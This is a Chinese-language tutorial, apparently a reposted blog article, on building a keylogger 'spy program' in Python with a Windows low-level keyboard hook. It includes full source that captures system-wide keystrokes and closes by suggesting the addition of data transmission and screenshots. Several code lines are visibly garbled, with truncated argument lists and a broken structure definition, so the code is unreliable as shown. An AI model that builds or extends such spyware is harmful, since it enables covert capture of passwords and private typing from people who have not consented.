1. 程式人生 > 程式設計 >使用Python打造一款間諜程式的流程分析

使用Python打造一款間諜程式的流程分析

知識點

這次我們使用python來打造一款間諜程式

程式中會用到許多知識點,大致分為四塊

  win32API 此處可以在MSDN上檢視

  Python基礎重點在cpytes庫的使用,使用方法請點選此處

  C語言基礎

  Hook

程式的基本原理在於通過註冊Hook,記錄系統事件

那麼什麼是Hook呢

Hook 技術又叫做鉤子函式,系統在呼叫函式之前,鉤子程式就先捕獲該訊息,鉤子函式先得到控制權,這時鉤子函式既可以加工處理(改變)該函式的執行行為,還可以強制結束訊息的傳遞

註冊Hook時我們需要先匯入DLL庫,在Python中我們使用ctypes來匯入,匯入方法如下

user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")

我們匯入了user32.dll和kernel32.dll

這兩個DLL有什麼用處呢

  user32.dll   是Windows使用者介面相關應用程式介面,用於包括Windows處理,基本使用者介面等特性,如建立視窗和傳送訊息

  kernel32.dll  控制著系統的記憶體管理、資料的輸入輸出操作和中斷處理

流程部分

知道了我們要使用什麼樣的工具,那麼第一步應該怎麼做呢

1.首先我們需要先註冊Hook到系統上,通過user32.dll中的SetWindowsHookExA函式,我們可以在系統上註冊鉤子

HHOOK SetWindowsHookExA(
 int idHook,HOOKPROC lpfn,HINSTANCE hmod,DWORD dwThreadId
);

通過檢視文件我們看到SetWindowsHookExA函式的引數及引數型別如上所示,詳細文件點選此連結檢視

通過文件我們看到第一個引數idHook中填入鉤子的型別

WH_KEYBOARD_LL的常量值為13代表的意思是監視低階鍵盤輸入事件,我們此處來監聽鍵盤事件

第二個引數lpfn代表指向鉤子過程的指標,要填入鉤子過程(函式),我們可以在此處來新增額外程式碼達到我們想要達成的目的

第三個引數hmod表示為DLL控制代碼,我們可以使用kernel32中的GetModuleHandleW來獲取控制代碼

最後一個引數dwThreadId我們填入0代表與同一桌面上所有的執行緒關聯

程式碼如下

user32.SetWindowsHookExA(13,handleProc,kernel32.GetModuleHandleW(),0)

如何使用Python來編寫我們的鉤子過程呢,通過ctypes文件我們可以得知windows下使用WINFUNCTYPE來建立函式

此時我們發現有WINFUNCTYPE和CFUNCTYPE兩個函式,具體要使用哪一個呢,這兩個的區別為

  WINFUNCTYPE  為Windows下獨有的,通過使用使用stdcall呼叫約定的函式

  CFUNCTYPE   使用標準C呼叫約定的函式

HOOKPROC = WINFUNCTYPE(c_int,c_int,POINTER(DWORD))

因為我們呼叫的是WH_KEYBOARD_LL,WH_KEYBOARD_LL會使用LowLevelKeyboardProc回撥函式,同時我們也需要在Python定義它

LowLevelKeyboardProc資料結構如下

LRESULT CALLBACK LowLevelKeyboardProc(
 _In_ int nCode,_In_ WPARAM wParam,_In_ LPARAM lParam
);

按照官方文件提示如果nCode小於零,則掛鉤過程必須將訊息傳遞給CallNextHookEx函式,而無需進一步處理,並且應返回CallNextHookEx返回的值

我們轉換為Python程式碼

class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode',DWORD),('scanCode',('flags',('time',('dwExtraInfo',DWORD)]

def hookProc(nCode,wParam,lParam):
 if nCode < 0:
 return user32.CallNextHookEx(hooked,nCode,lParam)
 else:
 # 此處插入我們的程式碼
 pass
 return user32.CallNextHookEx(hooked,lParam)

最後在我們退出程式時還需要刪除Hook,不然大量的Hook會使系統執行緩慢,雖然在Windows 7及更高版本上,該鉤子會被靜默刪除而不被呼叫。應用程式無法知道掛鉤是否已刪除。我們還是主動進行刪除

刪除需要使用user32.dll的UnhookWindowsHookEx,引數為Hook控制代碼

user32.UnhookWindowsHookEx(hooked)

下面貼上全部程式碼

import sys
from ctypes import *
from ctypes.wintypes import DWORD,HHOOK,HINSTANCE,MSG,WPARAM,LPARAM
user32 = CDLL("user32.dll")
kernel32 = CDLL("kernel32.dll")
class KBDLLHOOKSTRUCT(Structure):
 _fields_ = [
 ('vkCode',DWORD)]
def uninstallHookProc(hooked):
 if hooked is None:
 return
 user32.UnhookWindowsHookEx(hooked)
 hooked = None
def hookProc(nCode,lParam)
 else:
 if wParam == 256:
 if 162 == lParam.contents.value:
 print("Ctrl pressed,call Hook uninstall()")
 uninstallHookProc(hooked)
 sys.exit(-1)
 capsLock = user32.GetKeyState(20)
 # kb_struct = cast(lParam,POINTER(KBDLLHOOKSTRUCT))
 if lParam.contents.value==13:
 print("\n")
 elif capsLock:
 print(chr(lParam.contents.value),end="")
 else:
 print(chr(lParam.contents.value+32),end="")
 return user32.CallNextHookEx(hooked,lParam)
def startKeyLog():
 msg = MSG()
 user32.GetMessageA(byref(msg),0)
def installHookProc(hooked,pointer):
 hooked = user32.SetWindowsHookExA(
 13,pointer,0
 )
 if not hooked:
 return False
 return True
HOOKPROC = WINFUNCTYPE(c_int,POINTER(DWORD))
pointer = HOOKPROC(hookProc)
hooked = None
if installHookProc(hooked,pointer):
 print("Hook installed")
 try:
 msg = MSG()
 user32.GetMessageA(byref(msg),0)
 except KeyboardInterrupt as kerror:
 uninstallHookProc(hooked)
 print("Hook uninstall...")
else:
 print("Hook installed error")

貼上我們的效果圖

使用Python打造一款間諜程式的流程分析

我們還可以再新增上額外的程式碼比如資料傳輸,截圖等等 ^_^

如何想要了解更多的只是請點選這裡把 => 地址

總結

以上就是使用Python打造一款間諜程式的流程分析的詳細內容,更多關於python間諜程式請關注我們其它相關文章!